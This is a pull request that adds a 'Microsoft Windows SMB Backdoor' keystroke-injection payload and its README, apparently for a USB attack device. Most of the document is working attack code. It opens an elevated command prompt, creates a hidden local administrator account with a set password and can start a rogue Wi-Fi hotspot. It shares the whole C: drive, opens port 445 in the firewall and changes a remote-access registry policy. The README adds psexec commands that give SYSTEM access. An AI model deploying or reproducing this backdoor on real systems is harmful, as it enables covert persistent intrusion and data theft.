### PR TITLE
Add "Microsoft Windows" SMB Backdoor

### DIFF
--- a/payloads/library/remote_access/win_smb-backdoor/README.md
+++ b/payloads/library/remote_access/win_smb-backdoor/README.md
@@ -1,0 +1,73 @@
+# "Microsoft Windows" SMB Backdoor
+
+- Title:         "Microsoft Windows" SMB Backdoor
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Remote Access
+
+## Description
+
+1) Adds a user account.
+2) Adds this local user to local administrator group.
+3) If the target computer is equipped with a compatible Wi-Fi card :
+    Avoids security measures on the internal network with the 
+    creation of a wireless "Hosted Network".
+4) Shares "C:\" directory.
+5) Adds a rule to the firewall.
+6) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
+7) Hides user account.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly SMB_USERNAME="BB_User"
+readonly SMB_PASSWORD="BB_P@ssW0rD"
+
+##
+# (any) Administrators
+# (fr) Administrateurs
+##
+readonly GROUP_NAME="Administrators"
+
+##
+# Can be set to "true" if the target computer 
+# is equipped with a compatible Wi-Fi card.
+##
+readonly WIRELESS_HOTSPOT="false"
+
+readonly SMB_SHARE="BB_SHARE"
+
+```
+
+## Exploitation
+
+>
+> The name of the access point and the security key will be those defined by the values of the constants : **SMB_SHARE** and **SMB_PASSWORD**.
+>
+
+```
+hacker@hacker-computer:~$ nmcli dev wifi connect "<SMB_SHARE>" password "<SMB_PASSWORD>"
+```
+
+>
+> The connection identifiers will be those defined by the values of the constants : **SMB_USERNAME** and **SMB_PASSWORD**.
+>
+
+```
+hacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./<SMB_USERNAME>:<SMB_PASSWORD>@<TARGET>
+C:\WINDOWS\system32> whoami
+nt authority\system
+```
+
+>
+> The share name and identifiers will be those defined by the values of the constants : **SMB_SHARE**, **SMB_USERNAME** and **SMB_PASSWORD**.
+>
+
+```
+smb://<TARGET>/<SMB_SHARE>/
+```

--- a/payloads/library/remote_access/win_smb-backdoor/payload.txt
+++ b/payloads/library/remote_access/win_smb-backdoor/payload.txt
@@ -1,0 +1,139 @@
+#!/bin/bash
+#
+# Title:            "Microsoft Windows" SMB Backdoor
+#
+# Description:      
+#                   1) Adds a user account.
+#                   2) Adds this local user to local administrator group.
+#                   3) If the target computer is equipped with a compatible Wi-Fi card :
+#                       Avoids security measures on the internal network with the 
+#                       creation of a wireless "Hosted Network".
+#                   4) Shares "C:\" directory.
+#                   5) Adds a rule to the firewall.
+#                   6) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
+#                   7) Hides user account.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Remote Access
+# Target:           Microsoft Windows
+# Attackmode:       HID
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# The target user must belong to the 'Administrators' group.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly SMB_USERNAME="BB_User"
+readonly SMB_PASSWORD="BB_P@ssW0rD"
+
+##
+# (any) Administrators
+# (fr) Administrateurs
+##
+readonly GROUP_NAME="Administrators"
+
+##
+# Can be set to "true" if the target computer 
+# is equipped with a compatible Wi-Fi card.
+##
+readonly WIRELESS_HOTSPOT="false"
+
+readonly SMB_SHARE="BB_SHARE"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 2000
+Q GUI r
+Q DELAY 7000
+Q STRING "cmd"
+Q DELAY 1500
+Q CTRL-SHIFT ENTER
+Q DELAY 7000
+Q LEFTARROW
+Q DELAY 5000
+Q ENTER
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "NET USER ${SMB_USERNAME} ${SMB_PASSWORD} /ADD"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "NET LOCALGROUP ${GROUP_NAME} ${SMB_USERNAME} /ADD"
+Q ENTER
+Q DELAY 1500
+
+if [ "${WIRELESS_HOTSPOT}" == "true" ]
+then
+
+    LED SPECIAL
+
+    Q STRING "NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=${SMB_SHARE} KEY=${SMB_PASSWORD}"
+    Q ENTER
+    Q DELAY 5000
+    
+    Q STRING "NETSH WLAN START HOSTEDNETWORK"
+    Q ENTER
+    Q DELAY 5000
+
+fi
+
+LED STAGE3
+
+Q STRING "NET SHARE ${SMB_SHARE}=C:\\ /GRANT:${SMB_USERNAME},FULL /REMARK:\"BRemote BShare\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Server Message Block for BB\" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /f /v ${SMB_USERNAME} /t REG_DWORD /d 0"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+Q STRING "EXIT"
+Q ENTER
+Q DELAY 1500
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0


### PR DESCRIPTION
1) Adds a user account.
2) Adds this local user to local administrator group.
3) If the target computer is equipped with a compatible Wi-Fi card :
    Avoids security measures on the internal network with the 
    creation of a wireless "Hosted Network".
4) Shares "C:\" directory.
5) Adds a rule to the firewall.
6) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
7) Hides user account.